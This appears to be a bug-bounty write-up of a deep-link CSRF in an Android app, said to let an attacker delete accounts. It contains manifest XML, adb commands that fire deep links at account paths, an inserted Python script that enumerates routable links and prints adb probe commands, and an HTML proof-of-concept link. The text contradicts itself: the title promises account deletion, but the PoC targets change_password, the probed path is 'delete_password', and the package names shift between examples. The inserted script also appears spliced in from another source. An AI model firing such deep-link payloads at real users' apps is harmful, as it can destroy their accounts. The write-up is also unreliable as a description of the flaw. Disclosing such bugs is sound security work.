CSRF Leads to Delete Account


Happy Jester

Target: Android Application
Date: May 2024
Summary: I discovered a CSRF vulnerability in the Corp Android application that allows an attacker to delete user accounts by exploiting a deep link that reaches the delete-account endpoint.

First we look into AndroidManifest.xml. The splash activity is exported and registers an App Links intent-filter (android:autoVerify="true") for http and https URLs on www.example.com whose path starts with /account:

<activity android:theme="@style/Theme.Thredup.Splash" android:name="com.example.android.feature.splash.SplashActivity" android:exported="true" android:launchMode="singleTask" android:screenOrientation="behind" android:configChanges="screenSize|orientation" android:noHistory="true">
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="www.example.com" android:pathPrefix="/account"/>
<data android:scheme="https"/>
<data android:scheme="http"/>
</intent-filter>
</activity>
So the app handles every link under the /account path. Firing it from adb:

adb shell am start -a android.intent.action.VIEW -n com.thredup.android/com.thredup.android.feature.splash.SplashActivity -d "https://www.example.com/account/"

lands us in the Settings screen. Wait a moment: what does android:pathPrefix="/account" mean? The android:pathPrefix attribute specifies a partial path that is matched against only the initial part of the path in the Intent's data URI, so any URL whose path begins with /account is routed to this activity and the app decides what to do with the remainder. That means there may be something to find after /account. After intercepting the API calls made from Settings, such as Change Password and Delete Account, we try the same paths through the deep link:

adb shell am start -a android.intent.action.VIEW -n com.thredup.android/com.thredup.android.feature.splash.SplashActivity -d "https://www.example.com/account/change_password"

adb shell am start -a android.intent.action.VIEW -n com.thredup.android/com.thredup.android.feature.splash.SplashActivity -d "https://www.example.com/account/delete_password"
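The pathPrefix reasoning above, as an added example that is not code from the original write-up: a small Python model of Android's intent-filter data matching, run over a manifest fragment constructed from the activity quoted above. The package name com.example.android and the extra probe URLs are assumptions; the matching rules (schemes, hosts and paths from all data elements are merged, pathPrefix is a plain startswith test) follow how Android evaluates a VIEW intent. It also builds the same adb invocations used in this post for every URL the manifest actually routes, which is a quick way to enumerate candidate paths before sending them to a device.

```python
# Added example: model Android intent-filter data matching for deep links.
# Not code from the original post. The manifest below is constructed from the
# post's <activity>; the package name and probe paths are assumptions.
import shlex
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: the post's <activity> wrapped in a minimal root so the
# android: namespace resolves. Package name com.example.android is assumed.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.android">
  <application>
    <activity android:name="com.example.android.feature.splash.SplashActivity"
              android:exported="true">
      <intent-filter android:autoVerify="true">
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:host="www.example.com" android:pathPrefix="/account"/>
        <data android:scheme="https"/>
        <data android:scheme="http"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def attr(el, name):
    """Read an android:-namespaced attribute from an element."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


class DeepLinkFilter:
    """One <intent-filter>; Android merges the attributes of all <data> children."""

    def __init__(self, activity, filter_el):
        self.activity = activity
        self.schemes, self.hosts, self.paths = set(), set(), []
        for d in filter_el.findall("data"):
            if attr(d, "scheme"):
                self.schemes.add(attr(d, "scheme").lower())
            if attr(d, "host"):
                self.hosts.add(attr(d, "host").lower())
            for kind in ("path", "pathPrefix"):
                if attr(d, kind):
                    self.paths.append((kind, attr(d, kind)))
        self.browsable = any(
            attr(c, "name") == "android.intent.category.BROWSABLE"
            for c in filter_el.findall("category"))

    def matches(self, url):
        u = urlsplit(url)
        if u.scheme.lower() not in self.schemes:
            return False
        if self.hosts and (u.hostname or "").lower() not in self.hosts:
            return False
        if not self.paths:          # no path constraint: any path matches
            return True
        for kind, value in self.paths:
            # pathPrefix is a bare startswith test with no segment boundary,
            # so "/account" also routes "/accounts/..." and "/account_x".
            if kind == "path" and u.path == value:
                return True
            if kind == "pathPrefix" and u.path.startswith(value):
                return True
        return False


def load_filters(manifest_xml):
    """Collect every VIEW intent-filter declared on an activity."""
    root = ET.fromstring(manifest_xml)
    found = []
    for act in root.iter("activity"):
        for f in act.findall("intent-filter"):
            actions = {attr(a, "name") for a in f.findall("action")}
            if "android.intent.action.VIEW" in actions:
                found.append(DeepLinkFilter(attr(act, "name"), f))
    return found


def reachable(manifest_xml, url):
    """Activities a browser-originated VIEW intent for url would open."""
    return [f.activity for f in load_filters(manifest_xml)
            if f.browsable and f.matches(url)]


def adb_command(package, activity, url):
    """The adb invocation the post uses to fire a deep link by hand."""
    return "adb shell am start -a android.intent.action.VIEW -n %s -d %s" % (
        shlex.quote(package + "/" + activity), shlex.quote(url))


def probe_commands(manifest_xml, urls):
    """adb commands for every candidate URL the manifest actually routes."""
    package = ET.fromstring(manifest_xml).get("package")
    return [adb_command(package, activity, url)
            for url in urls for activity in reachable(manifest_xml, url)]


if __name__ == "__main__":
    # Assumed probe list: the post's paths plus prefix-boundary and host checks.
    for cmd in probe_commands(MANIFEST, [
            "https://www.example.com/account/",
            "https://www.example.com/account/change_password",
            "https://www.example.com/account/delete_password",
            "http://www.example.com/accounts/anything",  # matches: prefix only
            "https://www.example.com/settings",          # not under the prefix
            "https://evil.example.com/account/"]):       # wrong host
        print(cmd)
```

Running it prints four adb commands: the three /account paths and, because pathPrefix has no segment boundary, /accounts/anything as well; /settings and the evil.example.com host are dropped. Unverified http links are accepted by the filter too, so on a device without a verified assetlinks.json the user would get the app chooser rather than a direct launch.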

Now let's turn it into a CSRF. Because the intent-filter is BROWSABLE and the link is verified, tapping the link on a device where the app is installed and the victim is logged in opens the activity directly, and the app carries out the action bound to that path without asking the user to confirm it, which is the vulnerability. The fix is not to execute state-changing actions straight from a deep link: navigate to the screen, but require the user's explicit confirmation (or re-authentication) before calling the delete-account API. PoC:

<!DOCTYPE html>
<html>
<head><title>CSRF DEMO</title></head>
<body>
<a href="https://www.example.com/account/change_password">CSRF DEMO</a>
</body>
</html>